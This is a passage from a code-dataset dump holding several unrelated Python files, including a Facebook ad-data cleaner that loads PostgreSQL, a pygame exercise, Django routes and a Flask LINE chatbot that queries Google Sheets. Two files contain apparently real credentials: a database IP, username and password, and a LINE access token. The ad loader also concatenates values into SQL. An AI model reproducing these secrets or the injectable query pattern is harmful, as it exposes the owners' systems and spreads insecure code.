axis=1)\r\n#df_country.country.value_counts()\r\n\r\n\r\n# 从adset_name中解析出目标人群兴趣\r\n#adset_name_series = Series(df_ad['adset_name'].unique())\r\n#DataFrame(adset_name_series).to_excel(r'C:\\Users\\m7catsue\\Desktop\\adset_name.xls')\r\n\r\ndef parse_targeting_interests(adset_name_str):\r\n \"\"\"\r\n 从adset_name中解析出广告投放的目标人群的兴趣\r\n \"\"\"\r\n adset_name_str = adset_name_str + ' '\r\n \r\n if re.search(re.compile(\"(INT\\s+?\\d{2}-\\d{2}\\s+?.+)|(INT\\s+?.+?\\s+?)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"(INT\\s+?\\d{2}-\\d{2}\\s+?.+)|(INT\\s+?.+?\\s+?)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"INT|\\s|\\d|-\"), '', target_str).strip()\r\n #print('1')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\d{2}-\\d{2}\\+*\\s+(?!.*(LAL|IND|OCPM|Lookalike|google|GOOGLE|谷歌|\\.|安卓|OVERALL|付费|安装|月|EN)).+$\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\d{2}-\\d{2}\\+*\\s+(?!.*(LAL|IND|OCPM|Lookalike|google|\\.|安卓|OVERALL|付费|安装|月|EN)).+$\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"(\\d{2}-\\d{2}\\+*\\s+)|-|\\d|\\(|\\)|\\%\"), '', target_str).strip()\r\n #print('2')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"兴趣定向\\(.+\\)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"兴趣定向\\(.+\\)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"兴趣定向|\\(|\\)\"), '', target_str).strip()\r\n #print('3')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\:.+?(,|\\s)\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\:.+?(,|\\s)\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"\\:|,|\\s\"), '', target_str).strip()\r\n #print('4')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"\\%\\s+.+\\s+\\d{2}-\\d{2}\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\%\\s+.+\\s+\\d{2}-\\d{2}\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"\\%|\\s|\\d|\\-\"), '', target_str).strip()\r\n #print('5')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif re.search(re.compile(\"[A-Z]+\\s{1,2}\\w{2,99}?\\s+\\d{2}-\"), adset_name_str):\r\n target_str = re.search(re.compile(\"\\w+\\s{1,2}\\w{2,99}?\\s+\\d{2}-\"), adset_name_str).group().strip()\r\n target_str = re.sub(re.compile(\"[A-Z]|\\s|\\d|-\"), '', target_str).strip()\r\n #print('6')\r\n if target_str: return target_str\r\n else: return 'Not Specified'\r\n \r\n elif not re.search(re.compile(\"LAL|lookalike|INT|IND|google|登录|付费|安卓|iOS|月|And|OVERALL|Purchase|(\\d{2}-\\d{2}\\+*)|\\d*\\%\\d*|OCPM|\\s{1,2}M\\s{1,2}|-\"), adset_name_str):\r\n return adset_name_str.strip()\r\n \r\n else:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_targeting_interests'] = df_ad['adset_name'].apply(parse_targeting_interests)\r\n#len(df_ad['md_targeting_interests'].unique())\r\n#df_ad['md_targeting_interests'].value_counts()\r\n\r\n\r\n# 从'campaign_name'解析出投放广告时定位目标受众的方式:LAL or INT (在parse_targeting_interests函数之后使用)\r\n# OCPM:按展示付费; CPA:按下载付费 \r\n# LAL:根据种子用户进行相似性人群定位; iNT按照人群的兴趣定位\r\n#df_ad.ix[:, ['campaign_name', 'adset_name', 'ad_name']].to_excel(r'C:\\Users\\luyaxin\\Desktop\\df_temp.xls')\r\n\r\ndef parse_ad_targeting_method(row):\r\n \"\"\"\r\n Row function: 从'campaign_name'解析出投放广告时定位目标受众的方式:LAL or INT;\r\n 在parse_targeting_interests函数之后使用\r\n \"\"\"\r\n mobj = re.search(re.compile(\"LAL|INT|looklike|lookalike|Lookalike|兴趣|游戏定向\"), row['campaign_name'])\r\n if not mobj:\r\n if row['md_targeting_interests'] != 'Not Specified':\r\n return 'Interest_based'\r\n else:\r\n return 'Not Specified'\r\n else:\r\n target_str = mobj.group().strip()\r\n if re.match(re.compile(\"INT|兴趣|游戏定向\"), target_str):\r\n return 'Interest_based'\r\n if re.match(re.compile(\"LAL|looklike|lookalike|Lookalike\"), target_str):\r\n return 'Look-alike'\r\n\r\ndf_ad['md_ad_targeting_method'] = df_ad.apply(parse_ad_targeting_method, axis=1)\r\n#df_ad['ad_targeting_method'].value_counts()\r\n\r\n\r\n# 解析广告目标的OS类型\r\ndef parse_os_type(os_version_str):\r\n \"\"\"\r\n 返回广告目标的OS类型\r\n \"\"\"\r\n if os_version_str is np.nan:\r\n os_version_str = 'Not Specified'\r\n elif 'ios' in os_version_str.lower(): \r\n return 'IOS'\r\n elif 'android' in os_version_str.lower(): \r\n return 'ANDROID'\r\n else:\r\n return 'Not Specified'\r\n\r\ndf_ad['md_os_type'] = df_ad['adset_targeting_user_os'].apply(parse_os_type)\r\n#df_ad['md_os_type'].value_counts()\r\n\r\n# 清理字段前后的中括号、单引号和'u'\r\ndef clean_column_field(column_str):\r\n \"\"\"清理字段前后的中括号、单引号和'u'; 适用于:\r\n adset_targeting_device_platform, \r\n adset_targeting_user_os, \r\n adset_targeting_facebook_positions\r\n \"\"\"\r\n if column_str is np.nan:\r\n return 'Not Specified'\r\n\r\n column_str_list = str(column_str)[1:-1].split(',')\r\n temp_list = []\r\n for item in column_str_list:\r\n new_item = re.sub(re.compile(\"u|\\'\"), '', item).strip()\r\n temp_list.append(new_item)\r\n return ','.join(temp_list).replace('.', '_')\r\n\r\ndf_ad['md_targeting_device_platform'] = df_ad['adset_targeting_device_platform'].apply(clean_column_field) # mobile or desktop\r\ndf_ad['md_targeting_user_os_version'] = df_ad['adset_targeting_user_os'].apply(clean_column_field) # OS and version\r\ndf_ad['md_targeting_facebook_positions'] = df_ad['adset_targeting_facebook_positions'].apply(clean_column_field) # 'feed'; 'right_hand_column'\r\n\r\n\r\n\r\n# 对清洗之后的df_ad选择所需要的column和顺序\r\ndf_ad.fillna('Not Specified', inplace=True)\r\n\r\ndf_ad_rc = df_ad.ix[:, ['campaign_id', 'campaign_name', 'adset_id', 'adset_name', 'ad_id', 'ad_name',\r\n 'adset_targeting_user_device', 'adset_targeting_publisher_platforms',\r\n 'adset_targeting_geo_locations_types', 'adset_targeting_age_max', 'adset_targeting_age_min',\r\n 'md_campaign_date', 'md_targeting_genders', 'md_targeting_countries',\r\n 'md_ad_elements', 'md_targeting_interests', 'md_targeting_device_platform',\r\n 'md_os_type', 'md_targeting_user_os_version', 'md_targeting_facebook_positions',\r\n 'md_ad_targeting_method']]\r\n \r\ndf_ad_rc.rename(columns={'adset_targeting_user_device': 'targeting_user_device',\r\n 'adset_targeting_publisher_platforms': 'targeting_publisher_platforms',\r\n 'adset_targeting_geo_locations_types': 'targeting_geo_locations_types',\r\n 'adset_targeting_age_max': 'age_max', 'adset_targeting_age_min': 'age_min',\r\n 'md_campaign_date': 'campaign_date', 'md_targeting_genders': 'targeting_genders',\r\n 'md_targeting_countries': 'targeting_countries', 'md_ad_elements': 'ad_elements',\r\n 'md_targeting_interests': 'targeting_interests', \r\n 'md_targeting_device_platform': 'targeting_device_platform',\r\n 'md_os_type': 'os_type', 'md_targeting_user_os_version': 'targeting_user_os_version',\r\n 'md_targeting_facebook_positions': 'targeting_facebook_positions',\r\n 'md_ad_targeting_method': 'ad_targeting_method'}, inplace=True)\r\n\r\n\r\n########################################################\r\n#################### 写入数据库 #########################\r\n#######################################################\r\n\r\n# 所有字段都是字符串\r\npg_create_table_ad_campaigns = \"\"\"\r\nCREATE TABLE public.ad_campaigns(\r\n campaign_id CHARACTER VARYING(255) NOT NULL,\r\n campaign_name CHARACTER VARYING(255) NOT NULL,\r\n adset_id CHARACTER VARYING(255) NOT NULL,\r\n adset_name CHARACTER VARYING(255) NOT NULL,\r\n ad_id CHARACTER VARYING(255) NOT NULL,\r\n ad_name CHARACTER VARYING(255) NOT NULL,\r\n targeting_user_device CHARACTER VARYING(255) NOT NULL,\r\n targeting_publisher_platforms CHARACTER VARYING(255) NOT NULL,\r\n targeting_geo_locations_types CHARACTER VARYING(255) NOT NULL,\r\n age_max CHARACTER VARYING(255) NOT NULL,\r\n age_min CHARACTER VARYING(255) NOT NULL,\r\n campaign_date CHARACTER VARYING(255) NOT NULL,\r\n targeting_genders CHARACTER VARYING(255) NOT NULL,\r\n targeting_countries CHARACTER VARYING(255) NOT NULL,\r\n ad_elements CHARACTER VARYING(255) NOT NULL,\r\n targeting_interests CHARACTER VARYING(255) NOT NULL,\r\n targeting_device_platform CHARACTER VARYING(255) NOT NULL,\r\n os_type CHARACTER VARYING(255) NOT NULL,\r\n targeting_user_os_version CHARACTER VARYING(255) NOT NULL,\r\n targeting_facebook_positions CHARACTER VARYING(255) NOT NULL,\r\n ad_targeting_method CHARACTER VARYING(255) NOT NULL\r\n);\r\n\"\"\"\r\n\r\nconn = psycopg2.connect(\r\n host=\"52.34.85.153\",\r\n user='luyaxin',\r\n port='5439',\r\n password='Lyx12347',\r\n dbname='rowyy')\r\ncur = conn.cursor()\r\n\r\n#cur.execute(\"SET CLIENT_ENCODING TO 'UTF8';\")\r\n#conn.commit()\r\n\r\n# create table 'ad_campaigns'\r\ncur.execute(pg_create_table_ad_campaigns) \r\nconn.commit()\r\n\r\ncur.execute(\"TRUNCATE TABLE public.ad_campaigns\")\r\nconn.commit()\r\n\r\ndef insert_df_as_dict(dataframe):\r\n \"\"\"\r\n 将广告campaign数据写入pg数据库\r\n \"\"\"\r\n start = time.clock()\r\n column_names = dataframe.columns\r\n insert_count, error_count = 0, 0\r\n for row_array in dataframe.values:\r\n insert_dict = dict(zip(column_names, row_array))\r\n #print(insert_dict)\r\n try:\r\n cur.execute(\r\n \"\"\"INSERT INTO public.ad_campaigns (%s) VALUES (%s)\"\"\"\r\n % (','.join(insert_dict), ','.join(\"'%s'\" % insert_dict[key] for key in insert_dict)) # IMP单引号\r\n )\r\n conn.commit()\r\n insert_count += 1\r\n except:\r\n error_count += 1\r\n print('Error:\\n', sys.exc_info())\r\n continue\r\n \r\n time_elapsed = time.clock() - start\r\n print('All data inserted into database.\\nNumber of rows inserted: %s\\nNumber of errors: %s' \r\n % (insert_count, error_count))\r\n print('Time elapsed: %.3f' % time_elapsed)\r\n\r\n\r\n# Insert data into postgresqlDB\r\ninsert_df_as_dict(df_ad_rc)\r\n\r\n# 关闭数据库连接\r\ncur.close()\r\nconn.close()\r\n\r\n\r\n","sub_path":"T4F_User_Profiles/ad_campaign_preprocessing_m7.py","file_name":"ad_campaign_preprocessing_m7.py","file_ext":"py","file_size_in_byte":17184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"101536289","text":"import sys\n\nn, k = map(int, sys.stdin.readline().split())\np = sys.stdin.readline().strip()\n\nvisited = set()\nperson = []\n\nfor i, x in enumerate(p):\n if x == \"P\":\n person.append(i)\n\nfor i in range(len(person)):\n idx = person[i]\n for j in range(idx-k, idx+k+1):\n if 0<=j\\d+)/$',\n profile.profile_add_game, name='profile-add-game'),\n url(r'^profile/remove-game/name=(?P\\d+)/$',\n profile.profile_remove_game, name='profile-remove-game'),\n url(r'^profile/add-guild/name=(?P\\d+)/$',\n profile.profile_add_guild, name='profile-add-guild'),\n url(r'^profile/remove-guild/name=(?P\\d+)/$',\n profile.profile_remove_guild, name='profile-remove-guild'),\n]\n\n## EVENTS\n## THESE WILL BE IMPLEMENTED ON A PROJECT LEVEL FOR NOW\n# urlpatterns += [\n# url(r'^events/view/all/$', events.all_events, name='all-events'),\n# url(r'^events/view/(?P\\d+)/$', events.view_event, name='view-event'),\n# url(r'^events/modify/(?P\\d+)/$', events.modify_event, name='modify-event'),\n# url(r'^events/delete/(?P\\d+)/$', events.delete_event, name='delete-event'),\n# url(r'^events/create/$', events.create_event, name='create-event'),\n# ]\n\n# MISC\nurlpatterns += [\n url(r'^no-permissions/$', base.no_permissions, name='no_permissions'),\n]\n","sub_path":"app/core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"341755263","text":"from getch import getch\n\nwhile True:\n try:\n c = getch()\n x = bytes(c,'utf-8')\n if chr(3) == c:\n break\n print(c,flush=True, end='' if chr(13) != c else '\\n')\n except Exception as e:\n print(f'{repr(e)} : Running in Thonny?')\n","sub_path":"PiBotXBeeExperiments/KeyboardExample.py","file_name":"KeyboardExample.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"424467660","text":"#Alex Ladin\r\n#10/15/21\r\n#Learning diplay,\r\n#opening windows,\r\n#changing size window,\r\n#basic game loop\r\n\r\nimport pygame, random\r\n\r\nfrom pygame.draw import circle\r\n#first thing to do is to intialize pygame\r\npygame.init()\r\ncheck= True \r\nheight=600\r\nwidth=700\r\ncolors= {'black':(0,0,0), 'red':(225,0,0), 'green':(0,225,0), 'blue':(0,0,225), 'white':(225,225,225), 'purple':(150,0,150), 'pink':(400,225,225), 'light blue':(225,225,400), 'light green':(225,0,225)}\r\nColorList= ['black', 'red', 'green', 'blue', 'white','purple', 'pink', 'light blue', 'light green']\r\nrandColor=random.choice(ColorList)\r\nwhile check:\r\n #height=input(\"height of the window: (100-1000)\")\r\n #width=input(\"Width of your window: (100-1000)\")\r\n \r\n try:\r\n height=int(height)\r\n width=int(width)\r\n check= False\r\n except ValueError:\r\n check= False\r\ncolor= randColor\r\nwindow=pygame.display.set_mode((width,height)) #set up color \r\n# window.fill(color)\r\npygame.display.flip() #refresh window with new color \r\n#change title of your window \r\npygame.display.set_caption(\"Alex's Window\")\r\npygame.display.flip()\r\nhbox=50\r\nwbox=50\r\nspeed=5\r\nxc=random.randint(25,500)\r\nyc=random.randint(25,400)\r\nradius=hbox/2\r\n#ball=pygame.circle(x=width/2, y=width/2)\r\nrect=pygame.Rect(width/2, height/2, wbox, hbox )\r\npygame.draw.rect(window, color, rect)\r\n#pygame.draw.circle(window ,color.get('green'),rect)\r\npygame.draw.circle(window, colors.get('green'), (xc,yc), radius)\r\n\r\n\r\npygame.display.flip()\r\nrun=True\r\n\r\n#main loop for the game:\r\nwhile run:\r\n pygame.time.delay(100)\r\n for case in pygame.event.get():\r\n if case.type == pygame.QUIT:\r\n run= False\r\n #how to get the position of the mouse\r\n # x,y=pygame.mouse.get_pos()\r\n #print(\"(\"+str(x)+\",\"+str(y)+\")\")\r\n keyPressed= pygame.key.get_pressed()\r\n if keyPressed[pygame.K_UP]:\r\n rect.y -= speed\r\n if rect.y<0:\r\n rect.y=height\r\n if keyPressed[pygame.K_DOWN]:\r\n rect.y += speed\r\n if rect.y>height:\r\n rect.y=0\r\n if keyPressed[pygame.K_LEFT]:\r\n rect.x -= speed\r\n if rect.x<1:\r\n rect.x=width-wbox/2\r\n if keyPressed[pygame.K_RIGHT]:\r\n rect.x += speed\r\n if rect.x>width:\r\n rect.x=width-wbox/2\r\n if keyPressed[pygame.K_w]:\r\n yc -= speed\r\n if yc<0:\r\n yc=wbox\r\n if keyPressed[pygame.K_s]:\r\n yc += speed\r\n if yc> height:\r\n yc=height-wbox\r\n if keyPressed[pygame.K_a]:\r\n xc -= speed\r\n if xc<1:\r\n xc=wbox/2\r\n if keyPressed[pygame.K_d]:\r\n xc += speed\r\n print(\"xc= \", xc)\r\n if xc>(width-wbox):\r\n xc=width\r\n\r\n\r\n\r\n window.fill(color)\r\n pygame.display.flip()\r\n pygame.draw.rect(window, 'green', rect)\r\n pygame.draw.circle(window, colors.get('green'), (xc,yc), radius)\r\n pygame.display.flip()\r\n\r\n point =(xc, yc) \r\n collide=pygame.Rect.collidepoint(rect,point)\r\n #collide function\r\n if collide:\r\n radius += wbox/2\r\n rect.x=random.randrange(25,width)\r\n rect.y=random.randrange(25,height)\r\n \r\n pygame.draw.rect(window, colors.get('purple'), rect)\r\n pygame.draw.circle(window, colors.get('blue'), (point), radius)\r\n pygame.display.flip() \r\n if radius >= height/2:\r\n run=False\r\n \r\n\r\n\r\n\r\n\r\npygame.quit()\r\n","sub_path":"learningPygame3.py","file_name":"learningPygame3.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"17795219","text":"import panel_driver\nfrom threading import Thread\nfrom threading import Lock\nimport time\n\n\nclass Panel:\n\tdef __init__(self):\n\t\tself.button_list = []\n\t\tself.mutex_key = Lock()\n\t\tself.thread_started = False\n\t\tself.polling_thread = Thread(target = self.polling_buttons, args = (),)\n\n\tdef polling_buttons(self):\n\t\told_button = -1\n\t\tself.thread_started = True\n\t\twhile True:\n\t\t\tbutton = panel_driver.read_buttons()\n\t\t\tif button >= 0 and button != old_button:\n\t\t\t\tself.mutex_key.acquire()\n\t\t\t\tself.button_list.append(button)\t\n\t\t\t\tself.mutex_key.release()\n\t\t\t\tprint (self.button_list)\n\t\t\t\told_button = button\t\n\n\t#polling_thread = Thread(target = polling_buttons, args = (),)\n\n\tdef read_pressed_button(self):\n\t\tif self.thread_started is not True:\n\t\t\tself.start(self.polling_thread)\n\t\tif self.button_list:\n\t\t\tself.mutex_key.acquire()\n\t\t\tfirst_element = self.button_list.pop(0)\n\t\t\tself.mutex_key.release()\n\t\t\t#print first_element\n\t\t\treturn first_element\n\t\treturn 'no buttons pressed'\t\n\t\t\n\tdef start(self,thread):\n\t\tthread.daemon = True # Terminate thread when \"main\" is finished\n\t\tthread.start()\n\t\t#thread.join()\n\n","sub_path":"class_panel.py","file_name":"class_panel.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"592921942","text":"import frame\nimport FDB\n\nframes = frame.Frame()\nfdb = FDB.FDB()\n\n# read and process the frames from a file\nframes.read_frames()\nframes.parse_each_frame()\n\n# read and process the FDB from a file\nfdb.read_fdb()\nfdb.parse_fdb()\n\n#print(frames.frames)\n#print(fdb.fdb_entries)\n\n# for each frame, make a decision based on the FDB\n# and collect the decision into a list\nfor i in range(len(frames.frames)):\n info = fdb.strategies(frames.frames[i])\n frames.frames[i] += [info]\n print(info)\n\n# write the decisions into a file\nprint(fdb.fdb_entries)\nprint(frames.frames)\nframes.write_output()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246925024","text":"#!/usr/bin/env python\n# -*- coding: utf 8 -*-\n\"\"\"\nInitialize the library.\n\n:copyright: 2015 - Geo2X - VM\n:license: Apache 2.0\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\ndef _removeAxes(fig):\n \"\"\"\n Remove all axes from current figure and return blank figure\n \"\"\"\n axes = fig.get_axes()\n for a in axes:\n fig.delaxes(a)\n return fig\n \ndef verticalAxes(fig, n=2):\n \"\"\"\n Add n vertically stacked axes on the selected figure\n \n Returns figure and ax list\n \"\"\"\n fig = _removeAxes(fig)\n ax = []\n for i in range(n):\n ax.append( fig.add_subplot(n,1,i) )\n return fig, ax\n \ndef horizontalAxes(fig, n=2):\n \"\"\"\n Add n horizontally stacked axes on the selected figure\n \n Returns figure and ax list\n \"\"\"\n fig = _removeAxes(fig)\n ax = []\n for i in range(n):\n ax.append( fig.add_subplot(1,n,i) )\n return fig, ax","sub_path":"hierophis/plot/layout/subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163892714","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport difflib\nimport numpy as np\nimport pandas as pd\nimport itertools as it\nimport multiprocessing\nfrom datetime import datetime\nfrom ast import literal_eval\nimport settings\n\nfrom features import get_set_inter_assoc\nfrom features import jaccard_distance\nfrom features import diff_ratios\nfrom features import get_noun_intersect\n\n\ndef get_features(idx, row, is_test=False):\n qid1 = row['qid1']\n qid2 = row['qid2']\n tokens1 = set(row['tokens1'])\n tokens2 = set(row['tokens2'])\n question1 = row['question1']\n question2 = row['question2']\n token_inter, token_assoc = get_set_inter_assoc(tokens1, tokens2)\n label = int(row.get('is_duplicate', 0)) or -1\n pair = '{qid1}_{qid2}'.format(qid1=qid1, qid2=qid2)\n metas = {\n 'match_tokens': jaccard_distance(tokens1, tokens2),\n 'math_chars': diff_ratios(question1, question2),\n }\n token_noun_inter, token_noun_assoc = get_noun_intersect(tokens1, tokens2)\n if is_test:\n pair = str(idx)\n label = 0\n s = ('{label} {pair}'\n '|token_inter {token_inter} '\n '|token_assoc {token_assoc} '\n '|meta {meta_features} '\n '|noun_inter {noun_inter} '\n '|noun_assoc {noun_assoc}\\n').format(\n label=label,\n pair=pair,\n token_inter = ' '.join(token_inter),\n token_assoc = ' '.join(token_assoc),\n meta_features = ' '.join(['%s:%f' % x for x in metas.items()]),\n noun_inter = ' '.join(token_noun_inter),\n noun_assoc = ' '.join(token_noun_assoc),\n )\n return s\n\n\ndef get_df_features(df, is_test, fname):\n f = open(fname, 'a')\n for idx in df.index:\n row = df.loc[idx]\n s = get_features(idx, row, is_test=is_test)\n f.write(s)\n f.close()\n\n\ndef prepare_vw_dataset(df, is_test, vw_path='../vw_tmp/', fname='train'):\n fname = os.path.join(vw_path, fname)\n print('Start building %s' % fname)\n with multiprocessing.Pool(settings.butch_num) as pool:\n \n args = zip(np.array_split(df, settings.butch_num),\n it.repeat(is_test),\n it.repeat(fname))\n pool_results = pool.starmap(get_df_features, args)\n for pool_result in pool_results:\n pass\n\n\ndef join_with_questions(df, df_question):\n columns = [x for x in df.columns]\n df_question = df_question[['tokens']]\n df_question = df_question.rename(columns={'tokens': 'tokens1'})\n df = pd.merge(df, df_question, left_on='qid1', right_index=True)\n columns = columns + ['tokens1']\n df = df[columns]\n df_question = df_question.rename(columns={'tokens1': 'tokens2'})\n df = pd.merge(df, df_question, left_on='qid2', right_index=True)\n columns = columns + ['tokens2']\n df = df[columns]\n return df\n\n\ndef main(argv):\n train = pd.read_csv(settings.TRAIN_CONVERTED)\n test = pd.read_csv(settings.TEST_CONVERTED)\n train_features = pd.read_csv(settings.UNIQUE_QUESTION_TRAIN_TOKENS, names=['question', 'tokens'], index_col=0)\n test_features = pd.read_csv(settings.UNIQUE_QUESTION_TEST_TOKENS, names=['question', 'tokens'], index_col=0)\n #\n # convert tokens\n train_features.tokens = train_features.tokens.apply(literal_eval)\n test_features.tokens = test_features.tokens.apply(literal_eval)\n #\n # join with tokens\n train = join_with_questions(train, train_features)\n test = join_with_questions(test, test_features)\n #\n # rebalance data\n train_1 = train[train.is_duplicate == 1]\n train_0 = train[train.is_duplicate == 0]\n train_0 = train_0.sample(frac=2.5, replace=True)\n train_rebalanced = pd.concat([train_0, train_1])\n train_rebalanced = train_rebalanced.iloc[np.random.permutation(len(train_rebalanced))]\n train_rebalanced.index = range(len(train_rebalanced))\n #\n # building vw files\n print(datetime.now())\n prepare_vw_dataset(train_rebalanced, False, fname='train_rebalanced')\n print(datetime.now())\n prepare_vw_dataset(train, False, fname='train')\n print(datetime.now())\n prepare_vw_dataset(test, True, fname='test')\n print(datetime.now())\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"quora/scripts/prepare_dataset.py","file_name":"prepare_dataset.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"492971071","text":"# 7669 Сходинки\nn=input().split()\na=int(n[0])\nb=int(n[1])\nsymbol=str(n[2])\nif 0<=a-b<=1:\n print(a)\nelif symbol=='W':\n print(b+1)\nelif symbol=='S':\n print(b+2)\n","sub_path":"7000-7999/7669.py","file_name":"7669.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"320155336","text":"# -*- coding: utf-8 -*-\n\nfrom yaml import load\n\n# yaml can use one of two parsers.\ntry: # LibYAML version written in C\n from yaml import CLoader as Loader\nexcept ImportError: # Python version\n from yaml import Loader\n\n\nclass YAMLLoader(object):\n \"\"\"Convenience class to load and parse YML files.\n\n Parameters:\n - path: A string that needs to work with open(path)\n\n Adds convenience with regard to case\n \"\"\"\n\n def __init__(self, path=None):\n if path is None:\n raise AttributeError(\"Path must be set\")\n with open(path) as f:\n self._config = load(f.read(), Loader)\n\n def get(self):\n \"\"\"Returns the contents of the file parsed into a dict\"\"\"\n return self._config\n\n def get_lower(self):\n \"\"\"Returns a dict of the config file, with all keys lowercased\"\"\"\n return self._lower_keys(self._config)\n\n def _lower_keys(self, x):\n \"\"\"\n See\n https://stackoverflow.com/questions/4223654/\n how-to-ensure-that-a-python-dict-keys-are-lowercase for more info\n \"\"\"\n\n if isinstance(x, list):\n return [self._lower_keys(v) for v in x]\n elif isinstance(x, dict):\n return dict((k.lower(), self._lower_keys(v)) for k, v in x.items())\n else:\n return x\n","sub_path":"goption_brain/config/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"633828555","text":"from flask import Flask , request\r\nimport time\r\nfrom oauth2client.service_account import ServiceAccountCredentials\r\nimport gspread\r\n\r\n# รับค่าจาก User ผ่าน Line แล้วมาค้นหาข้อมูลใน Google Sheet\r\n\r\n\r\nlist_result_search = []\r\nresult_text = []\r\nreply_msg = []\r\n\r\ndef connect_google_sheet() :\r\n\tscope = [\"https://www.googleapis.com/auth/spreadsheets\"]\r\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name('credentials_google_api_mobile_operator.json', scope)\r\n\tgc = gspread.authorize(credentials)\r\n\t# Google Sheet name = linechatbot/google_api_mobile_operator\r\n\tsheet1 = gc.open_by_url('https://docs.google.com/spreadsheets/d/1o9fPEjsk-D_c9j6WeYbwMQtmdsq-HTEbw3E7_rnuUSA/edit#gid=0')\r\n\r\n\t# # Google Sheet name = line_link_sheet\r\n\t# sheet1 = gc.open_by_url('https://docs.google.com/spreadsheets/d/1XQXkBL_JDF26MMbm2MxRe68nVJsh3TYj9Uss8cET2Fo/edit#gid=0')\r\n\tworksheet = sheet1.get_worksheet(0) # sheet index in spreadsheets\r\n\tglobal list_data_sheet\r\n\tlist_data_sheet = worksheet.get_all_values()\r\n\r\napp = Flask(__name__)\r\nline_access_token = 'apiNXSRhFfgIJ+ueODzpaYbWloo8mtcVvhp7n6fZAN4/yZ4DWbQChvwxOULpt0c3iUbw1gfvu8HotYNTmvwaCiWVZiGuMoq7mcLQezNZ9J9vlvcDt/1QJXmL1elGMqRX8xOvdSGYjzdeKmQnsMLP2gdB04t89/1O/w1cDnyilFU='\r\n\r\n@app.route('/')\r\n\r\n@app.route(\"/webhook\", methods=[\"POST\",\"GET\"])\r\ndef webhook() :\r\n\tfrom reply_new import ReplyMessage # ดึง Function จาก File ชื่อ reply_new.py\r\n\tif request.method == \"GET\" :\r\n\t\treturn \"Your = GET method from ngrok\"\r\n\telif request.method == \"POST\" : # Check Method ถ้าเป็น POST คือเราที่เราส่งข้อความไปในไลน์\r\n\t\tdata = request.get_json() # รับข้อมูลแบบ json\r\n\t\tconnect_google_sheet()\r\n\r\n\t\tlist_result_search = []\r\n\t\ttext_from_line = data[\"events\"][0][\"message\"][\"text\"]\r\n\t\treply_token = data[\"events\"][0][\"replyToken\"]\r\n\r\n\t\tfor ii in range(len(list_data_sheet)) :\r\n\t\t\t# ตรวจสอบ\r\n\t\t\tif text_from_line in list_data_sheet[ii][0] : # ถ้ามี text_from_line (รับจาก User) มีค่าใน Google Sheet\r\n\t\t\t\tlist_result_search.append([str(list_data_sheet[ii][0]),str(list_data_sheet[ii][1])])\r\n\r\n\t\t# กรณี เจอข้อมูล 1 ข้อมูล\r\n\t\tif len(list_result_search) == 0 :\r\n\t\t\treply_msg = str(list_data_sheet[ii][0]) + ' : ' + str(list_data_sheet[ii][1])\r\n\t\t\tReplyMessage(Reply_token=reply_token, TextMessage=reply_msg,Line_Access_Token=line_access_token)\r\n\t\t# กรณี เจอข้อมูล มากกว่า 1 ข้อมูล\r\n\t\tif len(list_result_search) != 0 :\r\n\t\t\treply_msg = []\r\n\t\t\tfor iii in range(len(list_result_search)) :\r\n\t\t\t\tresult_text = str(list_result_search[iii][0]) + ' : ' + str(list_result_search[iii][1])\r\n\t\t\t\treply_msg = str(reply_msg) + ' , ' + str(result_text)\r\n\t\t\tprint(reply_msg)\r\n\t\t\tReplyMessage(Reply_token=reply_token, TextMessage=reply_msg,Line_Access_Token=line_access_token)\r\n\t\treturn \"OK\"\r\n\r\nif __name__ == \"__main__\" :\r\n\tapp.run(port = 200)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156143385","text":"import numpy as np\n\nI = -1; T = 10.; Nt = 40\n\ndt = T/float(Nt)\nt = np.linspace(0, T, Nt+1)\nu = 